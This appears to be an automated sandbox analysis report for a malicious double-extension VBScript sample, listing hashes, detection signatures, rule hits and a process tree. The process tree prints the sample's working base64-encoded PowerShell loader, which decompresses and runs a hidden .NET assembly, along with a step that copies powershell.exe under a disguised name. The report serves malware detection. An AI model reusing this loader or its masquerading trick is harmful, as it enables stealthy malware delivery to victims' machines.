Edit tour
Windows
Analysis Report
QT202515010642.JPG.PDF.vbs
Overview
General Information
| Sample name: | QT202515010642.JPG.PDF.vbs |
| Analysis ID: | 1592502 |
| MD5: | fa7d10eed98ba0f44b4a62614a2d7060 |
| SHA1: | 4ef4402fae038bac2c45fd2c4199a980f81703dc |
| SHA256: | 9993e35a69a19030637d51fc172f3b350e354ed49d43727f522526b66aadf208 |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Creates processes via WMI
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Cscript/Wscript Uncommon Script Extension Execution
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Double Extension Files
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6416 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\QT202 515010642. JPG.PDF.vb s" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 3052 cmdline: cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\Des ktop\QT202 515010642. JPG.PDF.vb s.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
QT202515010642.JPG.PDF.vbs.exe (PID: 3136 cmdline: "C:\Users\ user\Deskt op\QT20251 5010642.JP G.PDF.vbs. exe" -enc JABPAGMAbA BtAGoAagBo AHgAdABlAC AAPQAgAFsA UwB5AHMAdA BlAG0ALgBE AGkAYQBnAG 4AbwBzAHQA aQBjAHMALg BQAHIAbwBj AGUAcwBzAF 0AOgA6AEcA ZQB0AEMAdQ ByAHIAZQBu AHQAUAByAG 8AYwBlAHMA cwAoACkALg BNAGEAaQBu AE0AbwBkAH UAbABlAC4A RgBpAGwAZQ BOAGEAbQBl AC4AUgBlAH AAbABhAGMA ZQAoACcALg BlAHgAZQAn ACwAJwAnAC kAOwAkAEUA YQBlAHgAaw BnAHEAIAA9 ACAAZwBlAH QALQBjAG8A bgB0AGUAbg B0ACAAJABP AGMAbABtAG oAagBoAHgA dABlACAAfA AgAFMAZQBs AGUAYwB0AC 0ATwBiAGoA ZQBjAHQAIA AtAEwAYQBz AHQAIAAxAD sAIAAkAEsA ZgBpAGYAZw AgAD0AIABb AFMAeQBzAH QAZQBtAC4A QwBvAG4Adg BlAHIAdABd ADoAOgBGAH IAbwBtAEIA YQBzAGUANg A0AFMAdABy AGkAbgBnAC gAJABFAGEA ZQB4AGsAZw BxAC4AUgBl AHAAbABhAG MAZQAoACcA UgBFAE0AIA AnACwAIAAn ACcAKQAuAF IAZQBwAGwA YQBjAGUAKA AnAEAAJwAs ACAAJwBBAC cAKQApADsA JABVAG0Acw B0AHoAIAA9 ACAATgBlAH cALQBPAGIA agBlAGMAdA AgAFMAeQBz AHQAZQBtAC 4ASQBPAC4A TQBlAG0Abw ByAHkAUwB0 AHIAZQBhAG 0AKAAgACwA IAAkAEsAZg BpAGYAZwAg ACkAOwAkAF UAdQBkAGsA dABrAGsAZw B4AGkAIAA9 ACAATgBlAH cALQBPAGIA agBlAGMAdA AgAFMAeQBz AHQAZQBtAC 4ASQBPAC4A TQBlAG0Abw ByAHkAUwB0 AHIAZQBhAG 0AOwAkAFYA bwB1AHEAeQ BhACAAPQAg AE4AZQB3AC 0ATwBiAGoA ZQBjAHQAIA BTAHkAcwB0 AGUAbQAuAE kATwAuAEMA bwBtAHAAcg BlAHMAcwBp AG8AbgAuAE cAegBpAHAA UwB0AHIAZQ BhAG0AIAAk AFUAbQBzAH QAegAsACAA KABbAEkATw AuAEMAbwBt AHAAcgBlAH MAcwBpAG8A bgAuAEMAbw BtAHAAcgBl AHMAcwBpAG 8AbgBNAG8A ZABlAF0AOg A6AEQAZQBj AG8AbQBwAH IAZQBzAHMA KQA7ACQAVg BvAHUAcQB5 AGEALgBDAG 8AcAB5AFQA bwAoACAAJA BVAHUAZABr AHQAawBrAG cAeABpACAA KQA7ACQAVg BvAHUAcQB5 AGEALgBDAG wAbwBzAGUA KAApADsAJA BVAG0AcwB0 AHoALgBDAG wAbwBzAGUA KAApADsAWw BiAHkAdABl AFsAXQBdAC AAJABLAGYA aQBmAGcAIA A9ACAAJABV AHUAZABrAH QAawBrAGcA eABpAC4AVA BvAEEAcgBy AGEAeQAoAC kAOwBbAEEA cgByAGEAeQ BdADoAOgBS AGUAdgBlAH IAcwBlACgA JABLAGYAaQ BmAGcAKQA7 ACAAJABWAG IAbABqAHoA agBhAG0AYQ BvAHMAIAA9 ACAAWwBTAH kAcwB0AGUA bQAuAEEAcA BwAEQAbwBt AGEAaQBuAF 0AOgA6AEMA dQByAHIAZQ BuAHQARABv AG0AYQBpAG 4ALgBMAG8A YQBkACgAJA BLAGYAaQBm AGcAKQA7AC AAJABJAGUA agBlAHUAZw B5AG8AYgB2 ACAAPQAgAC QAVgBiAGwA agB6AGoAYQ BtAGEAbwBz AC4ARQBuAH QAcgB5AFAA bwBpAG4AdA A7ACAAWwBT AHkAcwB0AG UAbQAuAEQA ZQBsAGUAZw BhAHQAZQBd ADoAOgBDAH IAZQBhAHQA ZQBEAGUAbA BlAGcAYQB0 AGUAKABbAE EAYwB0AGkA bwBuAF0ALA AgACQASQBl AGoAZQB1AG cAeQBvAGIA dgAuAEQAZQ BjAGwAYQBy AGkAbgBnAF QAeQBwAGUA LAAgACQASQ BlAGoAZQB1 AGcAeQBvAG IAdgAuAE4A YQBtAGUAKQ AuAEQAeQBu AGEAbQBpAG MASQBuAHYA bwBrAGUAKA ApACAAfAAg AE8AdQB0AC 0ATgB1AGwA bAA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 3552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |   |
|---|
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||